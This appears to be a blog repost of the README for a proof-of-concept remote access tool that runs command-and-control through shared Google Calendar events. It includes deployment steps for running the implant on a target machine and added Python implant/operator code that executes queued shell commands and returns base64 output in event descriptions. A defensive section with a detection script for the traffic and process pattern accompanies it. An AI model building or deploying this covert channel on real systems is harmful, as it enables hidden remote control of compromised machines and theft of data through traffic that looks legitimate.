Google Calendar RAT (GCR) is a PoC of Command & Control (C2) over Google Calendar events. The tool was developed for those circumstances where it is difficult to set up an entire red-teaming infrastructure.
To use GCR, only a Gmail account is required. The script creates a covert channel by exploiting the event descriptions in Google Calendar; the target connects directly to Google, never to attacker-controlled infrastructure.
It could be considered a layer 7 application covert channel (but some friends would say it cannot be 🙂). Many thanks to my mates “Tortellini”.
POC
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNHc3oJMNs_PnSv9xyynXatTX7LXXvBwUKS4hG9Lcyf4OPXB4R2KoK04weaUE2B6Gy_9OB1vq3kKDmU5ME7ktdXsLadQiiGgXeoAMNavFvLDMr1_JiqOFirk2tHjGqpL4fp4EmOViSOGd5mnsRFoO1QWKb-IK7T_9SHdWSgSFOPEmHuhUK9kNhCsTwY2-f/s16000/246669403-b83e6f28-36bd-454d-9c04-87095a280b1a.gif)
How It Works
GCR connects to a shared Google Calendar and, after generating a unique ID for the target, checks for any yet-to-be-executed commands.
If it finds none, it creates a new event (fixed to “whoami”) as proof of connection. Every event is composed of two parts:
- The Title, which contains the unique ID; this means you can schedule multiple commands by creating several events that share the same unique ID as their name
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHb_BEDOEm2F0LNWz44B3MwxzupGnNj9y75MR-CQamobXI4YmoWhMQpOWs_P2hpB8G36OjHtpMLSfB3JsDZUkiJ42yKd6F654zNHBlFHmCccGxaSOtyo8l9AGI1gqEw2WrQ-PGz9PDEvsw81FlcKq_LlMeiRGlT44gax0AanUzkfWmSdJm2ISXzJ2zIc7/s16000/246695874-df999259-3b1b-419f-b555-204fc5dc2dbf.webp)
- The Description, which contains the command to execute and the base64-encoded output, separated by the pipe symbol “|”
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDW6lfzGJYB-YqY-3M3jZibGFA4Vvc4Apr6ct96_H2sH9Js8BjUNd3o2yRW5NzV_4CIXewp9SiflbszdHCqcCwGyU8BknA-BjYTQSwaYkqieB6rValD_3qHgw_rWGKCHtathHg0mUtsdPHrpPLPJVyhqVdJg9OcdnIy0-ovwPC6Xhsk8W_cgyboyvOQ6r/s16000/246695890-5f2630e2-5591-48d1-bae2-5695afa8a33e.webp)
Attack Workflow
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFNK3e4qo3yjYYfvReTL4f5OH-KNOwlzXWRBm9SG-vsfM2MPGHZslwOYGIx-5RMpES1R0StlnQ7N8NffFthYepcuLjJei9CzBizQOBKDooFWYXnyQy3ZCARnih8sl8j3mpj64kLtlAPdvrYJkf6NmQMu-aPgm_MBznxnqXF4iIVX-p3Y3qOMxUFuatSMZe/s16000/246698578-99bec717-4e9a-4880-9a5a-b038666441b6.webp)
What Will A SOC Analyst/Blue Teamer See?
Focusing specifically on the network aspect, the only connections established are to Google’s servers, so the traffic looks completely legitimate: there is no attacker domain, IP or certificate to block. What does stand out is on the host, namely the process that holds those connections and the shell children it spawns to run commands. Let’s check with Process Hacker:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWz7D2tQBvr_4A8Qk-2zm26Gl3MtPr-PK9QJ_dRbK3F6YtSLu6f3MTar06X8ZhxPnjwMmHq8D1BMicsrFqNJfAREz2fpIihMlMxloOSIJ9AoJjT91fVPoaxTPL1UBoGUVSGmMOrrj890S90j2ljB5wrndMW-9g7RErBxwQK16KJwdMn0sPkYnbBZu7unrX/s16000/246691703-66dbd7b5-4060-4829-9229-99bb0c5a19e5.png)
which results in this
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3c9Xqq5p5XNCD8rp-x05mkvvgGWhpXVY7eXU6zEn7dD01u3iH3R6ZQ79vm3p3YbNX2jUMCYDkctkDJeuqlqcFQfq9qxlSqtc43Ij4YuKd5jBZXnIuR9oLQQuC0hZSuczlN5VlNTaaYivrwgbvBwkwSbRljKNg4RXh5h8uXeIkY9XIic6OuuUcjGUKx4PE/s16000/246691676-244e9acf-44a9-45b7-92f5-f61d911446a3.webp)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKcHltfYQZJr9IGbXTrtC13mawM0DGVCjB7ZeNzkD0l9X9i11itv__hRXOz7oMTnZminY7J_ocs41uhWm9Otii-S474MADefaw8N5akYpAZV43OUu8Ff3_1tlFg3dwtKndMAB6HrYhRQ6x5bBY5gZlntCl2uu_XNzUxviVGDn6VtTM3QUY9xDW9XDFAJuO/s16000/246691715-14c875fc-c28f-45d6-94c1-64e3dd02606b.webp)
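Because the network side is indistinguishable from normal Google API traffic, a detection has to pair the process holding those connections with the reconnaissance commands it spawns. The following is an added example, not code from the GCR project or the original post: a small correlation over constructed Sysmon-style records (process creation and network connection events, invented here for illustration) that flags a process whose outbound connections go only to `googleapis.com` hosts and which also launched a shell child running a recon command. The hostnames, image paths and PIDs are assumptions for the sample data; the real script's exact destinations are not listed on this page.

```python
from collections import defaultdict
from typing import Dict, List

# Assumption: the Calendar API client talks to hosts under googleapis.com.
# Adjust to whatever your telemetry actually shows for the implant.
GOOGLE_API_SUFFIXES = ("googleapis.com",)
RECON_COMMANDS = ("whoami", "net user", "net users", "ipconfig", "systeminfo", "hostname")
SHELL_IMAGES = ("cmd.exe", "powershell.exe", "/bin/sh", "/bin/bash")

# Constructed, Sysmon-like records (not real telemetry).
# type 1 = ProcessCreate (EID 1), type 3 = NetworkConnect (EID 3).
SAMPLE_EVENTS = [
    {"type": 3, "pid": 4120, "image": r"C:\Users\bob\python.exe", "dest": "oauth2.googleapis.com", "port": 443},
    {"type": 3, "pid": 4120, "image": r"C:\Users\bob\python.exe", "dest": "www.googleapis.com", "port": 443},
    {"type": 1, "ppid": 4120, "pid": 4188, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"type": 1, "ppid": 4120, "pid": 4201, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c net users"},
    # Benign: a browser talking to Google with no shell children.
    {"type": 3, "pid": 2200, "image": r"C:\Program Files\Google\Chrome\chrome.exe", "dest": "www.googleapis.com", "port": 443},
    # Benign-ish: a script that spawns whoami but whose traffic is not Google-only.
    {"type": 3, "pid": 3300, "image": r"C:\Users\bob\python.exe", "dest": "pypi.org", "port": 443},
    {"type": 1, "ppid": 3300, "pid": 3310, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]


def is_google_api(host: str) -> bool:
    """True if the destination is a googleapis.com host (exact or subdomain match)."""
    return any(host == s or host.endswith("." + s) for s in GOOGLE_API_SUFFIXES)


def is_recon(cmdline: str) -> bool:
    """True if the command line contains one of the recon commands we care about."""
    low = cmdline.lower()
    return any(r in low for r in RECON_COMMANDS)


def find_calendar_c2_candidates(events: List[Dict]) -> Dict[int, Dict]:
    """Flag a PID whose outbound connections go exclusively to Google API hosts
    and which spawned a shell child running a recon command.

    Returns {pid: {"image": ..., "hosts": [...], "children": [...]}}."""
    dests = defaultdict(set)          # pid -> set of destination hostnames
    recon_children = defaultdict(list)  # parent pid -> recon command lines it spawned
    images = {}                       # pid -> image path of the connecting process
    for ev in events:
        if ev["type"] == 3:
            dests[ev["pid"]].add(ev["dest"])
            images[ev["pid"]] = ev["image"]
        elif ev["type"] == 1 and ev["image"].lower().endswith(SHELL_IMAGES) and is_recon(ev["cmdline"]):
            recon_children[ev["ppid"]].append(ev["cmdline"])

    hits = {}
    for pid, hosts in dests.items():
        if hosts and all(is_google_api(h) for h in hosts) and recon_children.get(pid):
            hits[pid] = {"image": images[pid], "hosts": sorted(hosts), "children": recon_children[pid]}
    return hits


if __name__ == "__main__":
    for pid, info in find_calendar_c2_candidates(SAMPLE_EVENTS).items():
        print(f"suspect pid={pid} image={info['image']} hosts={info['hosts']} children={info['children']}")
```

The "Google-only destinations" condition is deliberately narrow and will miss an implant embedded in a process that also browses; the stronger signal is the recon child processes hanging off an unexpected parent, which is exactly the Process Hacker view above. Feed it Sysmon EID 1/3 (or your EDR's equivalents) and tune `RECON_COMMANDS` to the commands you actually expect an operator to send.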
How To Use It
- Set up a Google service account and obtain the credentials.json file; place the file in the same directory as the script
- Create a new Google Calendar and share it with the newly created service account
- Edit the script to point to your calendar address
- Once executed on the target machine, an event with a unique target ID is created automatically and the “whoami” command is executed
- Use the following syntax in the event description for communication: CLEAR_COMMAND|BASE64_OUTPUT. Examples:
  - “whoami|”
  - “net users|”
- Events are created with a fixed date of May 30th, 2023. You can create an unlimited number of events using the unique ID as the event name.
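To make the event format from “How It Works” and the operator syntax above concrete, here is an added example that is not GCR's own code: a simulation of one polling round of the implant and of the operator reading results back, with the Google Calendar API swapped for an in-memory list of event resource bodies (the `summary`/`description`/`start`/`end` fields are the real Calendar API event shape; the start and end times and the time zone are assumptions, since the page only gives the date). The executor is injectable so the round can run without touching a shell; by default it runs the command with `subprocess`, as the PoC does. One deliberate change from the page's `CLEAR_COMMAND|BASE64_OUTPUT` description: the split is on the last pipe rather than the first, because base64 never contains “|”, which lets the operator send commands that themselves contain a pipe.

```python
import base64
import subprocess
from typing import Callable, Dict, List, Tuple

SEP = "|"
# Page states events are pinned to May 30th, 2023; the times and zone are assumptions.
EVENT_START = "2023-05-30T09:00:00"
EVENT_END = "2023-05-30T10:00:00"
TIME_ZONE = "UTC"


def build_event(target_id: str, command: str, output_b64: str = "") -> Dict:
    """Operator side: build a Calendar API event body.
    Title = target's unique ID, description = CLEAR_COMMAND|BASE64_OUTPUT
    (the output slot stays empty until the target has run the command)."""
    return {
        "summary": target_id,
        "description": f"{command}{SEP}{output_b64}",
        "start": {"dateTime": EVENT_START, "timeZone": TIME_ZONE},
        "end": {"dateTime": EVENT_END, "timeZone": TIME_ZONE},
    }


def parse_description(description: str) -> Tuple[str, str]:
    """Split 'cmd|b64' into (cmd, decoded_output).
    rpartition: base64 has no '|', so a pipe inside the command survives."""
    command, sep, output_b64 = description.rpartition(SEP)
    if not sep:
        raise ValueError("description does not contain the separator")
    output = base64.b64decode(output_b64).decode(errors="replace") if output_b64 else ""
    return command, output


def pending(calendar: List[Dict], target_id: str) -> List[Dict]:
    """Events addressed to this target whose output slot is still empty."""
    todo = []
    for ev in calendar:
        if ev.get("summary") != target_id:
            continue
        _, sep, output_b64 = ev.get("description", "").rpartition(SEP)
        if sep and output_b64 == "":
            todo.append(ev)
    return todo


def run_shell(command: str) -> str:
    """Default executor: run the command in a shell, as the PoC does."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def agent_poll(calendar: List[Dict], target_id: str,
               execute: Callable[[str], str] = run_shell) -> List[str]:
    """Implant side, one round: if nothing is pending create the 'whoami' check-in
    event, then run every pending command and write its base64 output back into
    the event description. Returns the commands that were executed."""
    todo = pending(calendar, target_id)
    if not todo:
        calendar.append(build_event(target_id, "whoami"))
        todo = pending(calendar, target_id)
    executed = []
    for ev in todo:
        command, _ = parse_description(ev["description"])
        out_b64 = base64.b64encode(execute(command).encode()).decode()
        ev["description"] = f"{command}{SEP}{out_b64}"
        executed.append(command)
    return executed


def operator_results(calendar: List[Dict], target_id: str) -> Dict[str, str]:
    """Operator side: decode every completed event for a target -> {command: output}."""
    results = {}
    for ev in calendar:
        if ev.get("summary") != target_id:
            continue
        command, output = parse_description(ev["description"])
        if output:
            results[command] = output
    return results


if __name__ == "__main__":
    shared_calendar: List[Dict] = []          # stands in for the shared Google Calendar
    tid = "a1b2c3d4"                          # the implant's generated unique ID (constructed)
    print("first check-in ran:", agent_poll(shared_calendar, tid))
    shared_calendar.append(build_event(tid, "net users"))   # operator queues a command
    print("second round ran:", agent_poll(shared_calendar, tid))
    for cmd, out in operator_results(shared_calendar, tid).items():
        print(f"{cmd!r} -> {out!r}")
```

Note what this does not give you: the description is plain text on Google's side, so anyone with read access to the calendar (or a Google Workspace admin reviewing the service account's calendar) sees the commands and, after one base64 decode, the output.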